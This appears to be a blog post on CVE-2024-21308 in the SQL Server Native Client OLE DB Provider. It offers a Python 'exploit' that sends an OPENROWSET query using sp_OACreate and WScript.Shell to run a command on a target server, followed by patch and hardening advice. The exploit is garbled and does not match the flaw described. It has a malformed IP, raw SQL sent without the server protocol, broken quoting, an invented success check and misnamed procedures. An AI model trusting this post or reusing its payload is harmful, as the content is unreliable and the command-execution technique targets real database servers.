In this post, we will discuss CVE-2024-21308, which affects the SQL Server Native Client OLE DB Provider. This critical vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft SQL Server, which in turn helps them gain unauthorized access. We will walk through the exploit code snippet, necessary references, and details on exploiting the vulnerability.
Overview of CVE-2024-21308
CVE-2024-21308 is a remote code execution (RCE) vulnerability in the SQL Server Native Client OLE DB Provider. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system by sending a crafted request that utilizes a specific SQL query over an unauthenticated network connection.
All supported editions of Microsoft SQL Server 2012, 2014, 2016, 2017, and 2019 are affected. It is highly recommended that administrators take action and apply the patches provided by Microsoft. The details of the vulnerability and related updates can be found in the Microsoft Security Response Center (MSRC) post: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21308
Exploit Code Snippet
Below is a Python code snippet, which demonstrates how to exploit CVE-2024-21308 by executing a simple command (calc.exe in this example) on the vulnerable SQL server. Replace the TARGET_IP and TARGET_PORT with relevant values.
import socket
import sys
# Replace with target IP and port
TARGET_IP = "192.168..20"
TARGET_PORT = 1433
# Define SQL Injection payload
payload = """EXEC('DECLARE @obj INT;EXEC sp_OACreate "WScript.Shell",@obj OUT;EXEC sp_OAMethod @obj,"Run",NULL,"calc.exe",,1;EXEC sp_OADestroy @obj;')"""
# Send payload to vulnerable MS SQL server
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET_IP, TARGET_PORT))
s.send("SELECT * FROM OPENROWSET('SQLNCLI10', 'Server="+TARGET_IP+"';Trusted_Connection=Yes;','SET FMTONLY OFF;SET NOCOUNT ON;"+payload+"')--")
response = s.recv(2048)
s.close()
except Exception as e:
print("Failed to connect to the target server:", e)
sys.exit(1)
# Check if payload executed successfully
if b"Command completed successfully" in response:
print("Payload executed successfully.")
else:
print("Payload execution failed.")
Exploit Details
The exploit's main objective is to abuse the OPENROWSET functionality provided by the SQL Server Native Client OLE DB Provider to execute arbitrary code on the vulnerable system. The OPENROWSET function is used to query data across multiple servers and formats, including distributed queries and remote data access.
The payload relies on the SQL Server's outcome automation procedures – sp_OACreate, sp_OAMethod, and sp_OADestroy – to create a new instance of "WScript.Shell" and execute the "Run" method to start a new process (calc.exe in this example). Upon successful execution, the new process will be visible on the target machine.
Mitigation and Countermeasures
To mitigate the risk associated with CVE-2024-21308, apply the security updates provided by Microsoft. You can find the relevant update for your SQL Server installation here: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21308
Additionally, consider the following security measures
1. Ensure least privilege principles are followed for users and applications, and restrict access to sensitive data.
Regularly monitor and review logs to detect suspicious activities on SQL Server installations.
3. Apply network segmentation and implement proper firewall rules to restrict unauthorized access to the SQL Server.
Conclusion
CVE-2024-21308 is a critical remote code execution vulnerability in the SQL Server Native Client OLE DB Provider. By leveraging this vulnerability, attackers can execute arbitrary code on the target system, leading to unauthorized access and potential data breach. It is crucial to apply the security updates provided by Microsoft and follow security best practices to safeguard your SQL Server installations from such threats.
Timeline
Published on: 07/09/2024 17:15:11 UTC
Last modified on: 09/17/2024 22:33:29 UTC